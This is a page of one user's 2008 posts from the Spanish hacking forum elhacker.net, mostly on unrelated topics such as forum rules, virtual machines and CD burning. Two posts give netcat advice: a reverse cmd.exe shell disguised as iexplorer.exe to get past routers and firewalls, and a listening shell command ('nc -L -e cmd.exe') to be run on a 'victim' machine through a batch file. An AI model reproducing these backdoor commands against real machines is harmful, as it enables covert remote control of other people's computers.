elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Estamos en la red social de Mastodon


  Mostrar Mensajes
Páginas: 1 ... 498 499 500 501 502 503 504 505 506 507 508 509 510 511 512 [513] 514 515 516 517 518 519 520 521 522 523 524 525 526
5121  Seguridad Informática / Hacking / Re: Jugando con netcat en: 9 Abril 2008, 16:02 pm
1- Con la conexion inversa puedes saltarte un router, es decir, puedes conectar a una pc en lan
También en algunos casos el firewall
2- No tengo idea pero no debería de haber problemas, igualemente es recomendable utilizar la misma versión, si tienes una para que enviar otra?  :-\
3- Te recomiendo leer este post
4- Exacto, es por eso que en ejemplo de Jugando con netcat v1.1 dice iexplorer.exe -d -e cmd.exe 127.0.0.1 80 en lugar de nc -d -e cmd.exe 127.0.0.1 80
5- Si, debe de estar abierto
En conexion directa si la persona tiene un router de por medio también tiene que estar mapeado el puerto
Y en el caso de conexion inversa eres tu quien debe de tenerlo mapeado en el caso de tener router
6- Exacto, depende de quien tenga el listen, la de Martín Fierro es directa

Saludos

[Modifico]: Me faltó decir que con la conexión inversa solucionas el problema de que la victima tenga ip dinámica, y en caso de que quién tenga ip dinámica seas tu te es más sencillo configurarte una cuenta no-ip  ;)
5122  Foros Generales / Sugerencias y dudas sobre el Foro / Re: [sugerencia]regla en: 8 Abril 2008, 18:11 pm
Yo creo que no estamos hablando de injusticias con usuarios normales, sino la aplicación de algo más que un ban, eso como se ve ahí, esta en las reglas del foro, pero que newbie lee esas reglas??,todos se limitan a registrarse y preguntar lo primero que quieren saber, si las mirasen si quiera no irian por todos los foros publicando mensajes que ya se han respondido muuuchas veces, así como también crean un post en un lugar, y luego en otro con la misma consulta  >:D
5123  Foros Generales / Sugerencias y dudas sobre el Foro / Re: [sugerencia]regla en: 8 Abril 2008, 16:27 pm
Estoy de acuerdo en que me parece un poco drástico lo de que te banen la cuenta por hacer esto, porque si viene al caso es lo que hacen todos los newbies, claro esta que a mi parecer esto baja un poco el nivel del foro, y recuerdo bien que la idea era que fuese subiendo de nivel

Pero creo que esto viene en parte porque practicamente nadie lee las normas del foro, ni de las distintas secciones, llamese hacking basico, avanzado, software, etc etc (igualmente son todas muy parecidas), pero bueno, lo que si se podría agregar es que;

Toda persona nueva deba de leer las normas antes de poder postear, y al pie de las cuales habría un acuerdo, como las que ponen las licencias de los softwares, luego de lo cual si, en el caso de preguntar algo que ya está por demás respondido, se te impida publicar un nuevo post hasta luego de por ej una semana, así se evita que sigan preguntando lo mismo, claro podrían ponerse distintas sanciones en función del tipo de pregunta, no es lo mismo una persona que pregunta algo de xss que alguien que pregunta como robar una pass de hotmail.

Obvio que cualquier nuevo usuario al que le bloqueen la cuenta, no tiene más que tirarse un rato creando una nueva cuenta para volver a ingresar, pero de seguro después de la segunda o máximo tercera vez ya no tendrán ganas de estar completando formularios  :P

No se que les parecerá, pero bueno

Saludos

P.D: me salió el mensaje de que alguien más ya había escrito  :-X, pero ya lo tenía pronto  ;D
5124  Informática / Tutoriales - Documentación / Re: Manual: Creando una Máquina Virtual en: 17 Marzo 2008, 15:21 pm
Citar
Buenas !!!
Tengo una duda....
Mientras mas memoria ram le coloquemos a nuestra maquina virtual menos memorian ram tendra nuestra maquina Fisica ?

Exacto, tener en cuenta además que si corres por ej 2 máquinas vituales con 256 mb cada una, son 512 mb menos para tu máquina física

Saludos
5125  Foros Generales / Dudas Generales / Re: como bajar videos de un reproductor adobe flash player???? en: 22 Febrero 2008, 10:00 am
He visto que este video queda en los temporales, como muchos otros, no se trata de un flash, sino de un video *.flv, como los de youtube, reproducelo en tu navegador y luego ve a los temporales, tandrás un archivo de este tipo de unos 27 mb.

Saludos  ;)
5126  Programación / Scripting / Re: Mandar ip Local mediante bat a mi pc en: 20 Febrero 2008, 20:13 pm
El buscador no muerde  :-X

Notificador de IP en BATCH
 :P
Saludos
5127  Programación / Programación Visual Basic / Re: Visual Basic Script - Ventana Activa en: 20 Febrero 2008, 05:31 am
En realidad si, Autoit utiliza un lenguaje similar a vbs, solo que le otorga muchas más funciones de las que tiene por si solo
Su principal defecto es el peso del ejecutable que se crea al final, para hacer algo muy simple terminas con un *.exe de 400 kb  :-\

Saludos
5128  Media / Multimedia / Re: [Duda] Cual es el formato original? en: 20 Febrero 2008, 05:25 am
Citar
por cierto es un toca cassette pero tiene un adaptador con una caja en la cajuela donde inserto cds (noc como se llama sorri ^^)

Creo que eso no es muy nuevo que digamos  :xD, ahora si estoy casi seguro que tampoco te lo reconoce porque estas utilizando discos regrabables, prueba hacerlo con uno común y nos cuentas como te va  :P

Saludos
5129  Media / Multimedia / Re: [Duda] Cual es el formato original? en: 20 Febrero 2008, 04:02 am
Como lo has grabado?? en wma?? porque puede que tu reproductor no lea tampoco este tipo de archivos.
Si tienes el wmp 11 ya viene con la opción de grabar cd de audio directamente.
Otro tema además puede ser que tu radio no reproduzca cd's regrabables.

Creo que deberías informarte un poco más sobre tu reproductor  :-\

Saludos
5130  Informática / Tutoriales - Documentación / Re: TUTORIAL DE NETCAT PÀRA NEWBIES en: 19 Febrero 2008, 23:28 pm
Citar
1º) El Netcat se baja o ya viene con el OS ?

Hay que descargarlo

Citar
2º) Este renglon: "C:\>nc.exe –p 4455 –d –L –e cmd.exe" lo tengo q ejecutar del cmd de mi equipo o desde la maquina remota? O sea que hay q hacer un batch que haga eso(el cual se ejecutara desde la maquina remota)?

Se ejecuta en la máquina victima, el metodo es el que prefieras, batch sería uno válido  ;)

Saludos
Páginas: 1 ... 498 499 500 501 502 503 504 505 506 507 508 509 510 511 512 [513] 514 515 516 517 518 519 520 521 522 523 524 525 526
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines